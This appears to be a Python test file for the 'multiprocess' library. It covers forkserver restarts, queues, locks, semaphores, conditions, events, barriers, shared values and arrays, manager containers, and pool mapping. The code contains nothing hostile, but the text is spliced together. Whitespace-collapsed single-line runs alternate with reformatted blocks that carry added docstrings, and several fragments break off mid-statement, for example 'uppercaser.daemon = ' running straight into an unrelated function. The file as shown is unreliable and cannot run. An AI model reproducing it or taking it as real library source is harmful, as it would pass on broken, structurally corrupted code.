check_forkserver_death(self, signum): # bpo-31308: if the forkserver process has died, we should still # be able to create and run new Process instances (the forkserver # is implicitly restarted). if self.TYPE == 'threads': self.skipTest('test not appropriate for {}'.format(self.TYPE)) sm = multiprocess.get_start_method() if sm != 'forkserver': # The fork method by design inherits all fds from the parent, # trying to go against it is a lost battle self.skipTest('test not appropriate for {}'.format(sm)) from multiprocess.forkserver import _forkserver _forkserver.ensure_running() # First process sleeps 500 ms delay = 0.5 evt = self.Event() proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay)) proc.start() pid = _forkserver._forkserver_pid os.kill(pid, signum) # give time to the fork server to die and time to proc to complete time.sleep(delay * 2.0) evt2 = self.Event() proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,)) proc2.start() proc2.join() self.assertTrue(evt2.is_set()) self.assertEqual(proc2.exitcode, 0) proc.join() self.assertTrue(evt.is_set()) self.assertIn(proc.exitcode, (0, 255)) def test_forkserver_sigint(self): # Catchable signal self.check_forkserver_death(signal.SIGINT) def test_forkserver_sigkill(self): # Uncatchable signal if os.name != 'nt': self.check_forkserver_death(signal.SIGKILL) # # # class _UpperCaser(multiprocess.Process): def __init__(self): multiprocess.Process.__init__(self) self.child_conn, self.parent_conn = multiprocess.Pipe() def run(self): self.parent_conn.close() for s in iter(self.child_conn.recv, None): self.child_conn.send(s.upper()) self.child_conn.close() def submit(self, s): assert type(s) is str self.parent_conn.send(s) return self.parent_conn.recv() def stop(self): self.parent_conn.send(None) self.parent_conn.close() self.child_conn.close() class _TestSubclassingProcess(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_subclassing(self): uppercaser = _UpperCaser() uppercaser.daemon = 
def queue_empty(q):
    """Return True when *q* holds no items.

    Uses q.empty() when the queue provides it; otherwise falls back to
    comparing q.qsize() against zero (some proxies lack empty()).
    """
    if hasattr(q, 'empty'):
        return q.empty()
    return q.qsize() == 0


def queue_full(q, maxsize):
    """Return True when *q* holds *maxsize* items.

    Uses q.full() when available, otherwise compares q.qsize() with the
    caller-supplied capacity.
    """
    if hasattr(q, 'full'):
        return q.full()
    return q.qsize() == maxsize
    def test_put(self):
        """Exercise every put() calling convention against a bounded queue.

        Fills a maxsize-6 queue via put/put_nowait in all argument forms,
        then verifies that further puts fail: immediately when non-blocking,
        and only after the requested timeout when blocking.  Finally a child
        process (_test_put) drains the queue so it reads empty again.
        """
        MAXSIZE = 6
        queue = self.Queue(maxsize=MAXSIZE)
        child_can_start = self.Event()
        parent_can_continue = self.Event()

        proc = self.Process(
            target=self._test_put,
            args=(queue, child_can_start, parent_can_continue)
            )
        proc.daemon = True
        proc.start()

        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)

        # All equivalent spellings of put: positional/keyword, blocking or not.
        queue.put(1)
        queue.put(2, True)
        queue.put(3, True, None)
        queue.put(4, False)
        queue.put(5, False, None)
        queue.put_nowait(6)

        # the values may be in buffer but not yet in pipe so sleep a bit
        time.sleep(DELTA)

        self.assertEqual(queue_empty(queue), False)
        self.assertEqual(queue_full(queue, MAXSIZE), True)

        put = TimingWrapper(queue.put)
        put_nowait = TimingWrapper(queue.put_nowait)

        # Non-blocking puts on a full queue must fail immediately...
        self.assertRaises(pyqueue.Full, put, 7, False)
        self.assertTimingAlmostEqual(put.elapsed, 0)

        self.assertRaises(pyqueue.Full, put, 7, False, None)
        self.assertTimingAlmostEqual(put.elapsed, 0)

        self.assertRaises(pyqueue.Full, put_nowait, 7)
        self.assertTimingAlmostEqual(put_nowait.elapsed, 0)

        # ...while blocking puts fail only after their timeout has elapsed.
        self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)

        self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
        self.assertTimingAlmostEqual(put.elapsed, 0)

        self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
        self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)

        # Let the child drain all six items, then confirm the queue is empty.
        child_can_start.set()
        parent_can_continue.wait()
        self.assertEqual(queue_empty(queue), True)
        self.assertEqual(queue_full(queue, MAXSIZE), False)

        proc.join()
        close_queue(queue)
) proc.daemon = True proc.start() self.assertEqual(queue_empty(queue), True) child_can_start.set() parent_can_continue.wait() time.sleep(DELTA) self.assertEqual(queue_empty(queue), False) # Hangs unexpectedly, remove for now #self.assertEqual(queue.get(), 1) self.assertEqual(queue.get(True, None), 2) self.assertEqual(queue.get(True), 3) self.assertEqual(queue.get(timeout=1), 4) self.assertEqual(queue.get_nowait(), 5) self.assertEqual(queue_empty(queue), True) get = TimingWrapper(queue.get) get_nowait = TimingWrapper(queue.get_nowait) self.assertRaises(pyqueue.Empty, get, False) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(pyqueue.Empty, get, False, None) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(pyqueue.Empty, get_nowait) self.assertTimingAlmostEqual(get_nowait.elapsed, 0) self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1) self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3) proc.join() close_queue(queue) @classmethod def _test_fork(cls, queue): for i in range(10, 20): queue.put(i) # note that at this point the items may only be buffered, so the # process cannot shutdown until the feeder thread has finished # pushing items onto the pipe. def test_fork(self): # Old versions of Queue would fail to create a new feeder # thread for a forked process if the original process had its # own feeder thread. This test checks that this no longer # happens. 
queue = self.Queue() # put items on queue so that main process starts a feeder thread for i in range(10): queue.put(i) # wait to make sure thread starts before we fork a new process time.sleep(DELTA) # fork process p = self.Process(target=self._test_fork, args=(queue,)) p.daemon = True p.start() # check that all expected items are in the queue for i in range(20): self.assertEqual(queue.get(), i) self.assertRaises(pyqueue.Empty, queue.get, False) p.join() close_queue(queue) def test_qsize(self): q = self.Queue() try: self.assertEqual(q.qsize(), 0) except NotImplementedError: self.skipTest('qsize method not implemented') q.put(1) self.assertEqual(q.qsize(), 1) q.put(5) self.assertEqual(q.qsize(), 2) q.get() self.assertEqual(q.qsize(), 1) q.get() self.assertEqual(q.qsize(), 0) close_queue(q) @classmethod def _test_task_done(cls, q): for obj in iter(q.get, None): time.sleep(DELTA) q.task_done() def test_task_done(self): queue = self.JoinableQueue() workers = [self.Process(target=self._test_task_done, args=(queue,)) for i in range(4)] for p in workers: p.daemon = True p.start() for i in range(10): queue.put(i) queue.join() for p in workers: queue.put(None) for p in workers: p.join() close_queue(queue) def test_no_import_lock_contention(self): with support.temp_cwd(): module_name = 'imported_by_an_imported_module' with open(module_name + '.py', 'w') as f: f.write("""if 1: import multiprocess as multiprocessing q = multiprocessing.Queue() q.put('knock knock') q.get(timeout=3) q.close() del q """) with support.DirsOnSysPath(os.getcwd()): try: __import__(module_name) except pyqueue.Empty: self.fail("Probable regression on import lock contention;" " see Issue #22853") def test_timeout(self): q = multiprocess.Queue() start = time.time() self.assertRaises(pyqueue.Empty, q.get, True, 0.200) delta = time.time() - start # bpo-30317: Tolerate a delta of 100 ms because of the bad clock # resolution on Windows (usually 15.6 ms). 
class _TestLock(BaseTestCase):
    """Basic acquire/release semantics for Lock and RLock."""

    def test_lock(self):
        lock = self.Lock()
        self.assertEqual(lock.acquire(), True)
        # A non-blocking second acquire on a plain Lock must fail.
        self.assertEqual(lock.acquire(False), False)
        self.assertEqual(lock.release(), None)
        # Releasing an unheld lock raises.
        self.assertRaises((ValueError, threading.ThreadError), lock.release)

    def test_rlock(self):
        lock = self.RLock()
        # An RLock may be re-acquired by its owner any number of times...
        for _ in range(3):
            self.assertEqual(lock.acquire(), True)
        # ...and must be released the same number of times.
        for _ in range(3):
            self.assertEqual(lock.release(), None)
        # One release too many raises.
        self.assertRaises((AssertionError, RuntimeError), lock.release)

    def test_lock_context(self):
        # Lock must work as a context manager.
        with self.Lock():
            pass
    def test_timeout(self):
        """Semaphore.acquire() timeout semantics (processes only).

        A non-blocking acquire must return immediately regardless of any
        timeout argument; a blocking acquire on a zero-valued semaphore
        must wait out (approximately) the requested timeout before failing.
        """
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        # Semaphore starts at zero, so every acquire below must fail.
        sem = self.Semaphore(0)
        acquire = TimingWrapper(sem.acquire)

        # Non-blocking: fails immediately, with or without a timeout value.
        self.assertEqual(acquire(False), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)

        self.assertEqual(acquire(False, None), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0.0)

        # The timeout is ignored when block=False.
        self.assertEqual(acquire(False, TIMEOUT1), False)
        self.assertTimingAlmostEqual(acquire.elapsed, 0)

        # Blocking: fails only after roughly the requested timeout elapses.
        self.assertEqual(acquire(True, TIMEOUT2), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)

        self.assertEqual(acquire(timeout=TIMEOUT3), False)
        self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
self.assertReturnsIfImplemented(0, get_value, woken) # wake up one process/thread cond.acquire() cond.notify() cond.release() # check one process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(1, get_value, woken) # wake up another cond.acquire() cond.notify() cond.release() # check other has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(2, get_value, woken) # check state is not mucked up self.check_invariant(cond) p.join() def test_notify_all(self): cond = self.Condition() sleeping = self.Semaphore(0) woken = self.Semaphore(0) # start some threads/processes which will timeout for i in range(3): p = self.Process(target=self.f, args=(cond, sleeping, woken, TIMEOUT1)) p.daemon = True p.start() self.addCleanup(p.join) t = threading.Thread(target=self.f, args=(cond, sleeping, woken, TIMEOUT1)) t.daemon = True t.start() self.addCleanup(t.join) # wait for them all to sleep for i in range(6): sleeping.acquire() # check they have all timed out for i in range(6): woken.acquire() self.assertReturnsIfImplemented(0, get_value, woken) # check state is not mucked up self.check_invariant(cond) # start some more threads/processes for i in range(3): p = self.Process(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() self.addCleanup(p.join) t = threading.Thread(target=self.f, args=(cond, sleeping, woken)) t.daemon = True t.start() self.addCleanup(t.join) # wait for them to all sleep for i in range(6): sleeping.acquire() # check no process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(0, get_value, woken) # wake them all up cond.acquire() cond.notify_all() cond.release() # check they have all woken for i in range(10): try: if get_value(woken) == 6: break except NotImplementedError: break time.sleep(DELTA) self.assertReturnsIfImplemented(6, get_value, woken) # check state is not mucked up self.check_invariant(cond) def test_timeout(self): cond = self.Condition() wait = TimingWrapper(cond.wait) 
    @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
    def test_waitfor(self):
        """Condition.wait_for() blocks until the predicate becomes true.

        A child process (_test_waitfor_f) first sets ``state`` to 0 and then
        itself waits for ``state == 4``; this side increments the shared
        value four times, notifying each time, and finally checks that the
        child exited cleanly.
        """
        # based on test in test/lock_tests.py
        cond = self.Condition()
        state = self.Value('i', -1)

        p = self.Process(target=self._test_waitfor_f, args=(cond, state))
        p.daemon = True
        p.start()

        with cond:
            # Blocks until the child has set state to 0 and notified.
            result = cond.wait_for(lambda : state.value==0)
            self.assertTrue(result)
            self.assertEqual(state.value, 0)

        for i in range(4):
            time.sleep(0.01)
            with cond:
                state.value += 1
                cond.notify()

        # The child exits 0 only if its own wait_for saw state reach 4.
        p.join(5)
        self.assertFalse(p.is_alive())
        self.assertEqual(p.exitcode, 0)
class _TestEvent(BaseTestCase):
    """Tests for Event: is_set()/wait() semantics across set()/clear()."""

    @classmethod
    def _test_event(cls, event):
        # Child-process body: set the event after a delay so the parent's
        # final blocking wait() below has something to wake up on.
        time.sleep(TIMEOUT2)
        event.set()

    def test_event(self):
        event = self.Event()
        wait = TimingWrapper(event.wait)

        # Removed temporarily, due to API shear, this does not
        # work with threading._Event objects. is_set == isSet
        self.assertEqual(event.is_set(), False)

        # Removed, threading.Event.wait() will return the value of the __flag
        # instead of None. API Shear with the semaphore backed mp.Event
        self.assertEqual(wait(0.0), False)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        # While clear, a timed wait blocks for the full timeout, then fails.
        self.assertEqual(wait(TIMEOUT1), False)
        self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)

        event.set()

        # See note above on the API differences
        self.assertEqual(event.is_set(), True)
        # Once set, wait() returns True immediately, timeout or not.
        self.assertEqual(wait(), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        self.assertEqual(wait(TIMEOUT1), True)
        self.assertTimingAlmostEqual(wait.elapsed, 0.0)
        # self.assertEqual(event.is_set(), True)

        event.clear()

        #self.assertEqual(event.is_set(), False)

        # A child sets the event after TIMEOUT2; the untimed wait() blocks
        # until then and must return True.
        p = self.Process(target=self._test_event, args=(event,))
        p.daemon = True
        p.start()
        self.assertEqual(wait(), True)
        p.join()
class Bunch(object):
    """
    A bunch of threads.
    """
    def __init__(self, namespace, f, args, n, wait_before_exit=False):
        """
        Construct a bunch of `n` threads running the same function `f`.

        If `wait_before_exit` is True, the threads won't terminate until
        do_finish() is called.
        """
        self.f = f
        self.args = args
        self.n = n
        # Cross-process counters: each worker appends its pid on start/finish,
        # so len() gives the number of workers in each state.
        self.started = namespace.DummyList()
        self.finished = namespace.DummyList()
        self._can_exit = namespace.Event()
        if not wait_before_exit:
            self._can_exit.set()

        threads = []
        for i in range(n):
            p = namespace.Process(target=self.task)
            p.daemon = True
            p.start()
            threads.append(p)

        def finalize(threads):
            for p in threads:
                p.join()

        # Join every worker when this Bunch is close()d or garbage-collected.
        self._finalizer = weakref.finalize(self, finalize, threads)

    def task(self):
        # Worker body: register start, run f, register finish, then (if
        # wait_before_exit was requested) hold the process alive until
        # do_finish() is called.
        pid = os.getpid()
        self.started.append(pid)
        try:
            self.f(*self.args)
        finally:
            self.finished.append(pid)
            self._can_exit.wait(30)
            assert self._can_exit.is_set()

    def wait_for_started(self):
        # Busy-wait (with small sleeps) until all n workers have registered.
        while len(self.started) < self.n:
            _wait()

    def wait_for_finished(self):
        while len(self.finished) < self.n:
            _wait()

    def do_finish(self):
        self._can_exit.set()

    def close(self):
        self._finalizer()
""" N = 5 defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout def setUp(self): self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout) def tearDown(self): self.barrier.abort() self.barrier = None def DummyList(self): if self.TYPE == 'threads': return [] elif self.TYPE == 'manager': return self.manager.list() else: return _DummyList() def run_threads(self, f, args): b = Bunch(self, f, args, self.N-1) try: f(*args) b.wait_for_finished() finally: b.close() @classmethod def multipass(cls, barrier, results, n): m = barrier.parties assert m == cls.N for i in range(n): results[0].append(True) assert len(results[1]) == i * m barrier.wait() results[1].append(True) assert len(results[0]) == (i + 1) * m barrier.wait() try: assert barrier.n_waiting == 0 except NotImplementedError: pass assert not barrier.broken def test_barrier(self, passes=1): """ Test that a barrier is passed in lockstep """ results = [self.DummyList(), self.DummyList()] self.run_threads(self.multipass, (self.barrier, results, passes)) def test_barrier_10(self): """ Test that a barrier works for 10 consecutive runs """ return self.test_barrier(10) @classmethod def _test_wait_return_f(cls, barrier, queue): res = barrier.wait() queue.put(res) def test_wait_return(self): """ test the return value from barrier.wait """ queue = self.Queue() self.run_threads(self._test_wait_return_f, (self.barrier, queue)) results = [queue.get() for i in range(self.N)] self.assertEqual(results.count(0), 1) close_queue(queue) @classmethod def _test_action_f(cls, barrier, results): barrier.wait() if len(results) != 1: raise RuntimeError def test_action(self): """ Test the 'action' callback """ results = self.DummyList() barrier = self.Barrier(self.N, action=AppendTrue(results)) self.run_threads(self._test_action_f, (barrier, results)) self.assertEqual(len(results), 1) @classmethod def _test_abort_f(cls, barrier, results1, results2): try: i = barrier.wait() if i == cls.N//2: raise RuntimeError 
    @classmethod
    def _test_reset_f(cls, barrier, results1, results2, results3):
        """Worker body: one designated party resets the barrier mid-wait.

        The party whose first wait() returned N//2 waits for everyone else
        to pile up on the barrier and then resets it, which must raise
        BrokenBarrierError in the other waiters (counted in results2,
        never results1).  The reset barrier must then be usable again by
        all parties (counted in results3).
        """
        i = barrier.wait()
        if i == cls.N//2:
            # Wait until the other threads are all in the barrier.
            while barrier.n_waiting < cls.N-1:
                time.sleep(0.001)
            barrier.reset()
        else:
            try:
                barrier.wait()
                results1.append(True)
            except threading.BrokenBarrierError:
                results2.append(True)
        # Now, pass the barrier again
        barrier.wait()
        results3.append(True)
""" results1 = self.DummyList() results2 = self.DummyList() results3 = self.DummyList() barrier2 = self.Barrier(self.N) self.run_threads(self._test_abort_and_reset_f, (self.barrier, barrier2, results1, results2, results3)) self.assertEqual(len(results1), 0) self.assertEqual(len(results2), self.N-1) self.assertEqual(len(results3), self.N) @classmethod def _test_timeout_f(cls, barrier, results): i = barrier.wait() if i == cls.N//2: # One thread is late! time.sleep(1.0) try: barrier.wait(0.5) except threading.BrokenBarrierError: results.append(True) def test_timeout(self): """ Test wait(timeout) """ results = self.DummyList() self.run_threads(self._test_timeout_f, (self.barrier, results)) self.assertEqual(len(results), self.barrier.parties) @classmethod def _test_default_timeout_f(cls, barrier, results): i = barrier.wait(cls.defaultTimeout) if i == cls.N//2: # One thread is later than the default timeout time.sleep(1.0) try: barrier.wait() except threading.BrokenBarrierError: results.append(True) def test_default_timeout(self): """ Test the barrier's default timeout """ barrier = self.Barrier(self.N, timeout=0.5) results = self.DummyList() self.run_threads(self._test_default_timeout_f, (barrier, results)) self.assertEqual(len(results), barrier.parties) def test_single_thread(self): b = self.Barrier(1) b.wait() b.wait() @classmethod def _test_thousand_f(cls, barrier, passes, conn, lock): for i in range(passes): barrier.wait() with lock: conn.send(i) def test_thousand(self): if self.TYPE == 'manager': self.skipTest('test not appropriate for {}'.format(self.TYPE)) passes = 1000 lock = self.Lock() conn, child_conn = self.Pipe(False) for j in range(self.N): p = self.Process(target=self._test_thousand_f, args=(self.barrier, passes, child_conn, lock)) p.start() self.addCleanup(p.join) for i in range(passes): for j in range(self.N): self.assertEqual(conn.recv(), i) # # # class _TestValue(BaseTestCase): ALLOWED_TYPES = ('processes',) codes_values = [ ('i', 4343, 24234), ('d', 
3.625, -4.25), ('h', -232, 234), ('c', latin('x'), latin('y')) ] def setUp(self): if not HAS_SHAREDCTYPES: self.skipTest("requires multiprocess.sharedctypes") @classmethod def _test(cls, values): for sv, cv in zip(values, cls.codes_values): sv.value = cv[2] def test_value(self, raw=False): if raw: values = [self.RawValue(code, value) for code, value, _ in self.codes_values] else: values = [self.Value(code, value) for code, value, _ in self.codes_values] for sv, cv in zip(values, self.codes_values): self.assertEqual(sv.value, cv[1]) proc = self.Process(target=self._test, args=(values,)) proc.daemon = True proc.start() proc.join() for sv, cv in zip(values, self.codes_values): self.assertEqual(sv.value, cv[2]) def test_rawvalue(self): self.test_value(raw=True) def test_getobj_getlock(self): val1 = self.Value('i', 5) lock1 = val1.get_lock() obj1 = val1.get_obj() val2 = self.Value('i', 5, lock=None) lock2 = val2.get_lock() obj2 = val2.get_obj() lock = self.Lock() val3 = self.Value('i', 5, lock=lock) lock3 = val3.get_lock() obj3 = val3.get_obj() self.assertEqual(lock, lock3) arr4 = self.Value('i', 5, lock=False) self.assertFalse(hasattr(arr4, 'get_lock')) self.assertFalse(hasattr(arr4, 'get_obj')) self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue') arr5 = self.RawValue('i', 5) self.assertFalse(hasattr(arr5, 'get_lock')) self.assertFalse(hasattr(arr5, 'get_obj')) class _TestArray(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def f(cls, seq): for i in range(1, len(seq)): seq[i] += seq[i-1] @unittest.skipIf(c_int is None, "requires _ctypes") def test_array(self, raw=False): seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831] if raw: arr = self.RawArray('i', seq) else: arr = self.Array('i', seq) self.assertEqual(len(arr), len(seq)) self.assertEqual(arr[3], seq[3]) self.assertEqual(list(arr[2:7]), list(seq[2:7])) arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4]) self.assertEqual(list(arr[:]), seq) self.f(seq) p = 
self.Process(target=self.f, args=(arr,)) p.daemon = True p.start() p.join() self.assertEqual(list(arr[:]), seq) @unittest.skipIf(c_int is None, "requires _ctypes") def test_array_from_size(self): size = 10 # Test for zeroing (see issue #11675). # The repetition below strengthens the test by increasing the chances # of previously allocated non-zero memory being used for the new array # on the 2nd and 3rd loops. for _ in range(3): arr = self.Array('i', size) self.assertEqual(len(arr), size) self.assertEqual(list(arr), [0] * size) arr[:] = range(10) self.assertEqual(list(arr), list(range(10))) del arr @unittest.skipIf(c_int is None, "requires _ctypes") def test_rawarray(self): self.test_array(raw=True) @unittest.skipIf(c_int is None, "requires _ctypes") def test_getobj_getlock_obj(self): arr1 = self.Array('i', list(range(10))) lock1 = arr1.get_lock() obj1 = arr1.get_obj() arr2 = self.Array('i', list(range(10)), lock=None) lock2 = arr2.get_lock() obj2 = arr2.get_obj() lock = self.Lock() arr3 = self.Array('i', list(range(10)), lock=lock) lock3 = arr3.get_lock() obj3 = arr3.get_obj() self.assertEqual(lock, lock3) arr4 = self.Array('i', range(10), lock=False) self.assertFalse(hasattr(arr4, 'get_lock')) self.assertFalse(hasattr(arr4, 'get_obj')) self.assertRaises(AttributeError, self.Array, 'i', range(10), lock='notalock') arr5 = self.RawArray('i', range(10)) self.assertFalse(hasattr(arr5, 'get_lock')) self.assertFalse(hasattr(arr5, 'get_obj')) # # # class _TestContainers(BaseTestCase): ALLOWED_TYPES = ('manager',) def test_list(self): a = self.list(list(range(10))) self.assertEqual(a[:], list(range(10))) b = self.list() self.assertEqual(b[:], []) b.extend(list(range(5))) self.assertEqual(b[:], list(range(5))) self.assertEqual(b[2], 2) self.assertEqual(b[2:10], [2,3,4]) b *= 2 self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]) self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6]) self.assertEqual(a[:], list(range(10))) d = [a, b] e = self.list(d) 
self.assertEqual( [element[:] for element in e], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]] ) f = self.list([a]) a.append('hello') self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']) def test_list_iter(self): a = self.list(list(range(10))) it = iter(a) self.assertEqual(list(it), list(range(10))) self.assertEqual(list(it), []) # exhausted # list modified during iteration it = iter(a) a[0] = 100 self.assertEqual(next(it), 100) def _test_list_proxy_in_list(self): a = self.list([self.list(range(3)) for _i in range(3)]) self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3) a[0][-1] = 55 self.assertEqual(a[0][:], [0, 1, 55]) for i in range(1, 3): self.assertEqual(a[i][:], [0, 1, 2]) self.assertEqual(a[1].pop(), 2) self.assertEqual(len(a[1]), 2) for i in range(0, 3, 2): self.assertEqual(len(a[i]), 3) del a b = self.list() b.append(b) del b def test_dict(self): d = self.dict() indices = list(range(65, 70)) for i in indices: d[i] = chr(i) self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices)) self.assertEqual(sorted(d.keys()), indices) self.assertEqual(sorted(d.values()), [chr(i) for i in indices]) self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices]) def test_dict_iter(self): d = self.dict() indices = list(range(65, 70)) for i in indices: d[i] = chr(i) it = iter(d) self.assertEqual(list(it), indices) self.assertEqual(list(it), []) # exhausted # dictionary changed size during iteration it = iter(d) d.clear() self.assertRaises(RuntimeError, next, it) def _test_dict_proxy_nested(self): pets = self.dict(ferrets=2, hamsters=4) supplies = self.dict(water=10, feed=3) d = self.dict(pets=pets, supplies=supplies) self.assertEqual(supplies['water'], 10) self.assertEqual(d['supplies']['water'], 10) d['supplies']['blankets'] = 5 self.assertEqual(supplies['blankets'], 5) self.assertEqual(d['supplies']['blankets'], 5) d['supplies']['water'] = 7 self.assertEqual(supplies['water'], 7) self.assertEqual(d['supplies']['water'], 
def sqr(x, wait=0.0):
    """Return x*x after an optional sleep of *wait* seconds."""
    time.sleep(wait)
    return x * x

def mul(x, y):
    """Return the product of x and y."""
    return x * y

def raise_large_valuerror(wait):
    """Sleep, then raise a ValueError carrying a ~1 MiB message."""
    time.sleep(wait)
    raise ValueError("x" * 1024**2)

def identity(x):
    """Return the argument unchanged."""
    return x

class CountedObject(object):
    """Object that tracks how many of its instances are currently alive."""

    n_instances = 0

    def __new__(cls):
        cls.n_instances += 1
        return object.__new__(cls)

    def __del__(self):
        type(self).n_instances -= 1

class SayWhenError(ValueError):
    """Deliberate error raised by exception_throwing_generator."""
    pass

def exception_throwing_generator(total, when):
    """Yield 0..total-1, raising SayWhenError at index *when*.

    A *when* of -1 raises as soon as iteration begins.
    """
    if when == -1:
        raise SayWhenError("Somebody said when")
    for value in range(total):
        if value == when:
            raise SayWhenError("Somebody said when")
        yield value
        # Pool.map must agree with builtin map, with and without an
        # explicit chunksize.
        self.assertEqual(pmap(sqr, list(range(10))),
                         list(map(sqr, list(range(10)))))
        self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
                         list(map(sqr, list(range(100)))))

    def test_starmap(self):
        # Pool.starmap must agree with itertools.starmap.
        psmap = self.pool.starmap
        tuples = list(zip(range(10), range(9,-1, -1)))
        self.assertEqual(psmap(mul, tuples),
                         list(itertools.starmap(mul, tuples)))
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(psmap(mul, tuples, chunksize=20),
                         list(itertools.starmap(mul, tuples)))

    def test_starmap_async(self):
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
                         list(itertools.starmap(mul, tuples)))

    def test_map_async(self):
        self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
                         list(map(sqr, list(range(10)))))

    def _test_map_async_callbacks(self):
        # Leading underscore keeps unittest from collecting this test.
        # `callback` receives the result list; `error_callback` receives
        # the exception raised by the task.
        call_args = self.manager.list() if self.TYPE == 'manager' else []
        self.pool.map_async(int, ['1'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(1, len(call_args))
        self.assertEqual([1], call_args[0])
        self.pool.map_async(int, ['a'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(2, len(call_args))
        self.assertIsInstance(call_args[1], ValueError)

    def test_map_unplicklable(self):
        # NOTE(review): "unplicklable" is a typo for "unpicklable"; kept
        # as-is so the public test name does not change.
        # Issue #19425 -- failure to pickle should not cause a hang
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class A(object):
            def __reduce__(self):
                raise RuntimeError('cannot pickle')
        with self.assertRaises(RuntimeError):
            self.pool.map(sqr, [A()]*10)

    def test_map_chunksize(self):
        # map_async on an empty iterable must finish promptly, not stall.
        try:
            self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
        except multiprocess.TimeoutError:
            self.fail("pool.map_async with chunksize stalled on null list")

    def test_map_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        # SayWhenError seen at the very first of the iterable
        with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1) # again, make sure it's reentrant with self.assertRaises(SayWhenError): self.pool.map(sqr, exception_throwing_generator(1, -1), 1) with self.assertRaises(SayWhenError): self.pool.map(sqr, exception_throwing_generator(10, 3), 1) class SpecialIterable: def __iter__(self): return self def __next__(self): raise SayWhenError def __len__(self): return 1 with self.assertRaises(SayWhenError): self.pool.map(sqr, SpecialIterable(), 1) with self.assertRaises(SayWhenError): self.pool.map(sqr, SpecialIterable(), 1) def test_async(self): res = self.pool.apply_async(sqr, (7, TIMEOUT1,)) get = TimingWrapper(res.get) self.assertEqual(get(), 49) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1) def test_async_timeout(self): res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0)) get = TimingWrapper(res.get) self.assertRaises(multiprocess.TimeoutError, get, timeout=TIMEOUT2) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2) def test_imap(self): it = self.pool.imap(sqr, list(range(10))) self.assertEqual(list(it), list(map(sqr, list(range(10))))) it = self.pool.imap(sqr, list(range(10))) for i in range(10): self.assertEqual(next(it), i*i) self.assertRaises(StopIteration, it.__next__) it = self.pool.imap(sqr, list(range(1000)), chunksize=100) for i in range(1000): self.assertEqual(next(it), i*i) self.assertRaises(StopIteration, it.__next__) def test_imap_handle_iterable_exception(self): if self.TYPE == 'manager': self.skipTest('test not appropriate for {}'.format(self.TYPE)) # SayWhenError seen at the very first of the iterable it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1) self.assertRaises(SayWhenError, it.__next__) # again, make sure it's reentrant it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1) self.assertRaises(SayWhenError, it.__next__) it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1) for i in range(3): self.assertEqual(next(it), i*i) self.assertRaises(SayWhenError, 
